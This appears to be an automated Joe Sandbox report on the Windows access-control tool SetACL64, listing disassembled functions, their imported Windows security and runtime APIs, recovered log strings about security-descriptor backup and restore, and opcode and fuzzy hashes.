ReleaseSRWLockExclusive, xrefs: 00007FF69707209B
CloseThreadpoolTimer, xrefs: 00007FF697071ECF
FreeLibraryWhenCallbackReturns, xrefs: 00007FF697071F42
CreateSymbolicLinkW, xrefs: 00007FF697071F77
InitializeCriticalSectionEx, xrefs: 00007FF697071E17
GetFileInformationByHandleEx, xrefs: 00007FF697071FB5
WaitForThreadpoolTimerCallbacks, xrefs: 00007FF697071EB8
CreateThreadpoolWork, xrefs: 00007FF6970720C9
GetCurrentProcessorNumber, xrefs: 00007FF697071F59
GetSystemTimePreciseAsFileTime, xrefs: 00007FF697071FE3
CreateSemaphoreW, xrefs: 00007FF697071E5C
GetTickCount64, xrefs: 00007FF697071F9E
FlsFree, xrefs: 00007FF697071DD2
CloseThreadpoolWait, xrefs: 00007FF697071F14

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
Instruction ID: bed52894e0620ef47ca13864b2fa0f64d17ccd4c5f4bf783c47d3cc0f01b3076
Opcode Fuzzy Hash: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
Instruction Fuzzy Hash: 2CA1A2E4E09B0791EE249B65BC5406533A1FF697D5F9850B1C84EC7330EEBCA1A9D321

Function 00007FF697057B10 Relevance: 73.4, APIs: 30, Strings: 11, Instructions: 1631COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32 ref: 00007FF697057F47

Part of subcall function 00007FF697043F80: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044104
Part of subcall function 00007FF697043F80: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69704410A

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF697058E2C
GetLastError.KERNEL32 ref: 00007FF697058E47

Part of subcall function 00007FF69704BF60: GetLastError.KERNEL32 ref: 00007FF69704BFCE

Part of subcall function 00007FF697044230: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704428B

GetLastError.KERNEL32 ref: 00007FF697059506
LocalFree.KERNEL32 ref: 00007FF6970595C3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059622
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059628
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705962E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059634
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705963A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059640
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059646
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705964C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059658
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705965E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059664
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705966A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059670
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059676
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059682
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059688
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697059694
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705969A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970596A0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970596A6

Part of subcall function 00007FF697039520: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697039606
Part of subcall function 00007FF697039520: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69703960C

Strings

> because a filter keyword matched., xrefs: 00007FF6970587FE
Restoring SD of: <, xrefs: 00007FF697058988
DoActionRestore, xrefs: 00007FF697057D36, 00007FF6970585BA, 00007FF69705884F, 00007FF6970589F2, 00007FF697058E9F, 00007FF697058FF1, 00007FF697059178, 00007FF69705931A
Writing SD to <, xrefs: 00007FF6970592DD
Input file for restore operation opened: ', xrefs: 00007FF697057CA6
" , xrefs: 00007FF697058065
>: , xrefs: 00007FF697058E79, 00007FF697058FC5, 00007FF69705914C
> failed with: , xrefs: 00007FF6970592EE
Omitting SD of: <, xrefs: 00007FF69705854F, 00007FF6970587E4
Restoring SD of <, xrefs: 00007FF697058E65, 00007FF697058FB4, 00007FF69705913B
> because neither owner, group, DACL nor SACL were backed up., xrefs: 00007FF697058569

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Concurrency::cancel_current_taskDescriptorFreeLocalSecurity$ConvertString
String ID: " $> because a filter keyword matched.$> because neither owner, group, DACL nor SACL were backed up.$> failed with: $>: $DoActionRestore$Input file for restore operation opened: '$Omitting SD of: <$Restoring SD of <$Restoring SD of: <$Writing SD to <
API String ID: 143920484-3190023557
Opcode ID: 15bc8f1a26296f697d3e6f5c2711eff66c31bdb87e4d1b345efa8cdd7b4d4860
Instruction ID: ac4acfcbfe44c145c9b820a93e462284141e57ee72f73a6b67126c35024c583f
Opcode Fuzzy Hash: 15bc8f1a26296f697d3e6f5c2711eff66c31bdb87e4d1b345efa8cdd7b4d4860
Instruction Fuzzy Hash: BCF291A2A15B8289EB309F35D8453ED2361FB547E8F405671EA5DC7AE9DF38E684C300

Function 00007FF697068360 Relevance: 49.9, APIs: 25, Strings: 3, Instructions: 902COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32 ref: 00007FF697068401
GetLastError.KERNEL32 ref: 00007FF69706840B
GetAce.ADVAPI32 ref: 00007FF69706844A
IsValidSid.ADVAPI32 ref: 00007FF69706846E
IsValidSid.ADVAPI32 ref: 00007FF6970684AE
IsValidSid.ADVAPI32 ref: 00007FF697068D54
GetLastError.KERNEL32 ref: 00007FF697068D8E
IsValidSid.ADVAPI32 ref: 00007FF697068E0E
DeleteAce.ADVAPI32 ref: 00007FF697068FC4
GetLastError.KERNEL32 ref: 00007FF697068FFB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706918D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697069193
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697069199
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706919F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691A5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691AB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691BD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691CF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691D5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691DB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691E1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691E7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970691ED

Strings

> was not found in domain <, xrefs: 00007FF6970688D1
ProcessACEsOfGivenDomains, xrefs: 00007FF6970689C6
Account <, xrefs: 00007FF6970688B7

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Valid$ErrorLast$DeleteInformation
String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
API String ID: 2636496183-3371799133
Opcode ID: 9a3de9c15898c57846f777a987bea00d9bf1c6b9597bda2110fe323b3954fc78
Instruction ID: a7b627c112c79aacca48c3b66732afeb9745bf41585162551a6b7e60373f3f5c
Opcode Fuzzy Hash: 9a3de9c15898c57846f777a987bea00d9bf1c6b9597bda2110fe323b3954fc78
Instruction Fuzzy Hash: 03828DA2B15B8289EB208B68D8553AD3361FB447E8F504375DA6DC7BD9DF78E280C304

Function 00007FF69706A630 Relevance: 45.9, APIs: 18, Strings: 8, Instructions: 388memoryCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706A681
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF69706A6B5
SysAllocString.OLEAUT32 ref: 00007FF69706A6EF
SysAllocString.OLEAUT32 ref: 00007FF69706A73B
SysAllocString.OLEAUT32 ref: 00007FF69706A7C0

Strings

__systemsecurity, xrefs: 00007FF69706A734
2z, xrefs: 00007FF69706A79D
GetSD, xrefs: 00007FF69706AAF6
t5x, xrefs: 00007FF69706A964
$x, xrefs: 00007FF69706A977
__systemsecurity=@, xrefs: 00007FF69706A6E8, 00007FF69706AAA8
w, xrefs: 00007FF69706A9B6
SetSD, xrefs: 00007FF69706A7B9

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: AllocString$DescriptorSecurityValid_invalid_parameter_noinfo_noreturn
String ID: GetSD$SetSD$__systemsecurity$__systemsecurity=@$t5x$$x$2z$w
API String ID: 1218313072-3940533286
Opcode ID: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
Instruction ID: b757dad8602f656f7055bd73b6d2e6d2733f8449dc7634eae3619fcdaa6d6985
Opcode Fuzzy Hash: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
Instruction Fuzzy Hash: 71F147B2A0AB4286EB24EF65E86136873A0FF44B94F148575DA4DC3794EF3CD694C350

Function 00007FF6970442A0 Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 286COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6970442DA
OpenProcessToken.ADVAPI32 ref: 00007FF6970442EC
GetLastError.KERNEL32 ref: 00007FF6970442F6
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF69704431F
GetLastError.KERNEL32 ref: 00007FF697044329
CloseHandle.KERNEL32 ref: 00007FF697044336
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704471E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704472A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044730
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044736
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704473C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044742
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044748

Strings

Enabling, xrefs: 00007FF6970443BE
the privilege , xrefs: 00007FF697044412
SetPrivilege, xrefs: 00007FF6970444D9
failed with: , xrefs: 00007FF69704447D

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
String ID: failed with: $ the privilege $Enabling$SetPrivilege
API String ID: 152255395-1151176482
Opcode ID: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
Instruction ID: 857b6871a6adf30be20ec56a5d230139b604ecc1dcafafd338734429ff9896a3
Opcode Fuzzy Hash: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
Instruction Fuzzy Hash: 8DD182A2B18B4281FB209B65D4843AD2371FB957E8F505275EA5DD3AE9EF7CE081D300

Function 00007FF69708EF6C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1208COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF69708EFB5
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69708F5C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69708F783
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69708F98A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69708FC4E
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69708FE49
memcpy_s.LIBCPMT ref: 00007FF69708FF37
memcpy_s.LIBCPMT ref: 00007FF69708FFE2
memcpy_s.LIBCPMT ref: 00007FF6970900AB

Strings

1#IND, xrefs: 00007FF697090151
1#INF, xrefs: 00007FF69709017F
1#QNAN, xrefs: 00007FF697090163
1#SNAN, xrefs: 00007FF69709015A

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 936cf4456d6ae3aa195b210b09d182522d297c425d5cf5ba6d24be8079477b51
Instruction ID: 677c2c475b39c129f87488022b8e408313fee80d1b54329ff99b23db310ac965
Opcode Fuzzy Hash: 936cf4456d6ae3aa195b210b09d182522d297c425d5cf5ba6d24be8079477b51
Instruction Fuzzy Hash: 74B2C0B2A182828AE7758F78D5407F937A1FB987C8F505175DA0AD7B85DF3AB9408B00

Function 00007FF69704BF60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 267librarymemorywindowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF69704BFCE
#13.ACTIVEDS ref: 00007FF69704C132
SysStringByteLen.OLEAUT32 ref: 00007FF69704C196
SysAllocStringByteLen.OLEAUT32 ref: 00007FF69704C1A2
SysFreeString.OLEAUT32 ref: 00007FF69704C1FA
LoadLibraryExW.KERNEL32 ref: 00007FF69704C241
LoadLibraryExW.KERNEL32 ref: 00007FF69704C285
FormatMessageW.KERNEL32 ref: 00007FF69704C2C4
LocalFree.KERNEL32 ref: 00007FF69704C2FA
FreeLibrary.KERNEL32 ref: 00007FF69704C30D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704C38A

Strings

pdh.dll, xrefs: 00007FF69704C27E
netmsg.dll, xrefs: 00007FF69704C23A

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: FreeLibraryString$ByteLoad$AllocErrorFormatLastLocalMessage_invalid_parameter_noinfo_noreturn
String ID: netmsg.dll$pdh.dll
API String ID: 40273658-131213443
Opcode ID: 509bcff9dc41729db223f1edf4d17637db7f3b14702afe9ed8d969c13de03bd2
Instruction ID: 858affcbe9ef3a894e8c1d2ecae1df9f59772cc1807064ebb7a8f887711457c2
Opcode Fuzzy Hash: 509bcff9dc41729db223f1edf4d17637db7f3b14702afe9ed8d969c13de03bd2
Instruction Fuzzy Hash: 78B1BFB2B08B4286EB208B15E8443AE73A1FB54BE8F544275DA5DC3BA4EF7CE541D740

Function 00007FF6970680F6 Relevance: 13.6, APIs: 9, Instructions: 137COMMON

Download Yara Rule

APIs

SetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF6970680FD
SetSecurityDescriptorGroup.ADVAPI32 ref: 00007FF697068116
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF697068133
SetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF697068154
GetLastError.KERNEL32 ref: 00007FF697068162
MakeSelfRelativeSD.ADVAPI32 ref: 00007FF6970681EE
MakeSelfRelativeSD.ADVAPI32 ref: 00007FF69706820E
GetLastError.KERNEL32 ref: 00007FF69706821C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706834B

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: DescriptorSecurity$ErrorLastMakeRelativeSelf$DaclGroupOwnerSacl_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3822310168-0
Opcode ID: 1a143b5dc0866976304182db4d08a821830a9c3d75e33f02e80d987c8124c854
Instruction ID: 131e329c7f27ceabeda9469446d2a032b4ebe4c76ad049b18e8fb881d0fb4c88
Opcode Fuzzy Hash: 1a143b5dc0866976304182db4d08a821830a9c3d75e33f02e80d987c8124c854
Instruction Fuzzy Hash: 2D5149E2A09A4281EA64DF61D86A3793365FF90BC8F008172CA4DC76D5EF2CE691C304

Function 00007FF697087674 Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,00007FF69707966D), ref: 00007FF6970877CB
GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 00007FF6970877E4
ProcessCodePage.LIBCMT ref: 00007FF69708780E
IsValidCodePage.KERNEL32 ref: 00007FF697087820
IsValidLocale.KERNEL32 ref: 00007FF697087836
GetLocaleInfoW.KERNEL32 ref: 00007FF697087892
GetLocaleInfoW.KERNEL32 ref: 00007FF6970878AE

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 3939093798-0
Opcode ID: 0169081db4081aa29c78300c3f8140622a5bf0e0fe167edd77ba9466bcfcc269
Instruction ID: ccb9a368750c030d63208e2b22f329d8321b22435020fbafff6032e1ac983ab7
Opcode Fuzzy Hash: 0169081db4081aa29c78300c3f8140622a5bf0e0fe167edd77ba9466bcfcc269
Instruction Fuzzy Hash: 00715AA2B0864289FB70DBA4D8506F827A0FF84B94F445176CE1DD3789EF3EA445C710

Function 00007FF697072E8C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF697072EA8
RtlCaptureContext.NTDLL ref: 00007FF697072ED5
RtlLookupFunctionEntry.NTDLL ref: 00007FF697072EEF
RtlVirtualUnwind.NTDLL ref: 00007FF697072F30
IsDebuggerPresent.KERNEL32 ref: 00007FF697072F84
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF697072FA5
UnhandledExceptionFilter.KERNEL32 ref: 00007FF697072FB0

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
Instruction ID: d62fc92fc40a52eec82bc41cc79e21860a00de81cd88c256f75ad2e4279823ab
Opcode Fuzzy Hash: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
Instruction Fuzzy Hash: EE312DB2609A819AEB709F60E8403ED7374FB94798F44443ADA4DC7A95EF38D648C710

Function 00007FF69706F9C0 Relevance: 9.5, Strings: 7, Instructions: 710COMMON

Download Yara Rule

Strings

NT SERVICE, xrefs: 00007FF69706FB82
NT VIRTUAL MACHINE, xrefs: 00007FF69706FE20
IIS AppPool, xrefs: 00007FF69706FF70
WINDOW MANAGER, xrefs: 00007FF6970700C0
NT AUTHORITY, xrefs: 00007FF69706FA34
Font Driver Host, xrefs: 00007FF697070210
APPLICATION PACKAGE AUTHORITY, xrefs: 00007FF69706FCD0

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
String ID: APPLICATION PACKAGE AUTHORITY$Font Driver Host$IIS AppPool$NT AUTHORITY$NT SERVICE$NT VIRTUAL MACHINE$WINDOW MANAGER
API String ID: 2016263034-1572346215
Opcode ID: 1fb07fcdeecce9f14301a7ac34e795235f9f09835de906e15c143d3a66afb55b
Instruction ID: f667050d192c6c85b6ed7843a37a510560df9a894c18007fe5d90bd8e89c4fe2
Opcode Fuzzy Hash: 1fb07fcdeecce9f14301a7ac34e795235f9f09835de906e15c143d3a66afb55b
Instruction Fuzzy Hash: 75528EA6B06A0684EF20CB66D4942BD37A0FB89FC8B458576CE0EC3764EE3CE555C350

Function 00007FF69708C76C Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69708C7B5

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

